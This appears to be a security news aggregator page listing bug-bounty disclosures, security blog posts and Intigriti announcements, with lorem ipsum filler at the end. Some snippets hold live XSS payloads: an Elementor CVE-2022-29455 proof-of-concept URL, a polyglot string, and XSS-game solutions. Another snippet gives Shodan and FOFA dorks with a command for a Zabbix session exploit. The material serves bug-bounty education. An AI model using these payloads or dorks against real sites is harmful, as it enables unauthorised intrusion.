External service interaction (HTTP)
October 26, 2022 Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921 [Source]
View moreOctober 26, 2022 Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240 [Source]
View moreOctober 26, 2022 8×8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846 [Source]
View moreOctober 26, 2022 Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616 [Source]
View moreOctober 26, 2022 Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773 [Source]
View moreOctober 26, 2022 U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 – Bounty: $500 [Source]
View moreOctober 26, 2022 Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 – Bounty: $5000 [Source]
View moreOctober 26, 2022 Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914 [Source]
View moreOctober 26, 2022 MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248 [Source]
View moreOctober 26, 2022 Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 – Bounty: $1200 [Source]
View moreOctober 26, 2022 Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 – Bounty: $600 [Source]
View moreOctober 26, 2022 Have you ever wished Google Assistant could read you the articles in your Feedly? Now it can. Nick Felker has created a Google Assistant Action that integrates Google Assistant and Feedly. Thanks to the Feedly action, Google Assistant can list the headlines in your feeds, read specific articles, and even…
View moreOctober 26, 2022 Easily track key business events like funding events, product launches, or partnerships. Industries are changing at a faster pace than ever. Keeping up with new threats and opportunities can be overwhelming and time-consuming. Today, we’re excited to announce a new Leo skill that lets you easily track key strategic moves…
View moreOctober 26, 2022 We’re excited to launch a new version of the Feedly Web UI that improves the navigation and adds support for a cool dark theme. Here’s a quick demo of the new Feedly dark theme and left navigation bar updates: More visible Add Content (+) The profile and add content are…
View moreOctober 26, 2022 The post New reward system to accelerate learning and growth on Detectify appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post SSRF vulnerabilities and where to find them appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post How To Hack Web Applications in 2022: Part 2 appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post Module disclosures now available for hackers on Detectify Crowdsource appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post Account hijacking using “dirty dancing” in sign-in OAuth-flows appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post How to: Look for TLS private keys on Docker Hub appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post Leveraging AWS QuickSight dashboards to visualize recon data appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 The post How To Hack Web Applications in 2022: Part 1 appeared first on Detectify Labs. [Source]
View moreOctober 26, 2022 – The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions. This issue leads to: CVE 2022-29455 4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin. Reference: – https://nvd.nist.gov/vuln/detail/CVE-2022-29455 – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor – https://www.rotem-bar.com/elementor * POC (Proof Of Concept): The payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from…
View moreOctober 26, 2022 In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: shodan-query: http.favicon.hash:892542951 fofa-query: app=”ZABBIX-监控系统” && body=”saml” usage nuclei -l target.txt -tags zabbix python3 zabbix_session_exp.py -t https:target.com…
View moreOctober 26, 2022 You must have heard about time travel in movies, series and comics. Well here we are Nah i’m not joking you can travel back in time and can fetch the endpoints from web applications to do further exploitation, don’t believe me xD You will after Travelling from TheTimeMachine, PS Doesn’t…
View moreOctober 26, 2022 jaVasCript:/*-/*`/*`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/–!>x3csVg/<sVg/oNloAd=alert()//>x3e [Source]
View moreOctober 26, 2022 Mostly, penetration testing can use the extensions for the purpose to locate the broken links and inform the client, and these extensions also help to determine whether a target website contains vulnerabilities that can lead to adversarial exploitations and sensitive information theft. Here are the different chrome extensions that are…
View moreOctober 26, 2022 Hi guys ,This is Neil Harvey Miñano a Newbie security researcher from Philippine.This is my 1st write-up and also I am not good at XSS so forgive all mistakes.It was 04/20/2021 and my 1st day of bug hunting.I’m still newbie!Today I am gonna to Share a Reflected Xss vulnerability what…
View moreOctober 26, 2022 Improper Access Control to Remote Code Execution (CVE-2020-8591) In this post. I will explain how I hacked a whole system by exploiting improper access control vulnerability in the popular java-based MaaS software “eG Manager” and how I can escalated it to execute code remotely. Impact The Improper Access Control weakness…
View moreOctober 26, 2022 Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/ [Source]
View moreOctober 26, 2022 https://xss-game.appspot.com/ Level #1: Hello, world of XSShttps://xss-game.appspot.com/level1Solution: <script>alert(‘xss’)</script>hint: inspect the source code of the page Level #2: Persistence is keyhttps://xss-game.appspot.com/level2Solution: <img src=x onerror=alert(‘XSS’)>hint: “welcome” post contains HTML Level #3: That sinking feeling…https://xss-game.appspot.com/level3/frame#1Solution: https://xss-game.appspot.com/level3/frame#1′ onerror=’alert(“xss”)’> Level #4: Context mattershttps://xss-game.appspot.com/level4/frameSolution: timer=’);alert(‘xss Level #5: Breaking protocolhttps://xss-game.appspot.com/level5/frameSolution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(‘xss’) Level #6: Follow the Xhttps://xss-game.appspot.com/level6/frame#/static/gadget.jsSolution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert(‘xss’)…
View moreOctober 26, 2022 Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So…
View moreOctober 26, 2022 Penetration Testing as a Service (PTaaS), much like the other renditions of centrally hosted Software as a Service technologies (SaaS), is about providing a more flexible, continuous and scalable pentesting service. While remaining distinct from bug bounty programs, PTaaS is a modern approach to the traditional pentesting format. How does Penetration…
View moreOctober 26, 2022 Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The second series is curated by InsiderPhD. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the weeks from October 9th until October 15th. Intigriti…
View moreOctober 26, 2022 Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The second series is curated by InsiderPhD. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources. This issue covers the weeks from October 2nd until October 8th. Intigriti…
View moreOctober 26, 2022 Intigriti, Europe’s leading crowdsourced security platform, today announced a significant expansion of its bug bounty platform offerings with the launch of Hybrid Pentesting. The Penetration Testing as a Service (PTaas) solution combines the pay-for-impact approach of bug bounty programs with the dedicated resourcing strategy found with classic penetration testing. The…
View moreOctober 26, 2022 As a cybersecurity company, it’s perhaps unsurprising that we’re passionate about ensuring the safety of data and assets. This, of course, goes beyond just providing it to our clients. As guarders of sensitive customer data, it is imperative that our own safety measures are constantly under review. This is why…
View moreOctober 26, 2022 Welcome back everyone to Bug Bytes, the weekly newsletter curated by members of the Bug Bounty community! As you may have read in the last issue the previous author of Bug Bytes, Mariem / PentesterLand, left Intigriti and the torch of Bug Bytes to whomever would take it up. Every…
View moreOctober 26, 2022 The need for continuous security testing is quickly cementing bug bounty platforms as an integral part of cybersecurity infrastructure. However, it’s less often that cybersecurity technology and solution providers supply bug bounty programs in addition to their other offerings. This is not surprising, given the careful approach and expertise that…
View moreOctober 26, 2022 Working in Intigriti’s product team means playing a defining role in the global uptake of crowdsourced security. Since 2016, we’ve enabled hackers to use their skills for good and provide essential continuous testing for businesses. You’ll gain first-hand experience of a scaling company within a flexible working environment. Join…
View moreOctober 26, 2022 TL;DR Changelog 39: Communication is key Communicating with others about a bug or vulnerability that has been found and submitted as report is one of the necessary key features for a bug bounty platform. Communication between the relevant stakeholders should be quick, easy and transparent but also provide some assurance…
View moreOctober 26, 2022 After putting in-person live hacking events on hold due to social distancing regulations and travel restrictions, Yahoo made a ground-breaking comeback this month with their 1337UP0822 event. The global media and tech company combined forces with Intigriti to host their first in-person live hacking event in more than two years. …
View moreOctober 26, 2022 Quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Do eiusmod tempor incididunt ut labore et dolore.
View more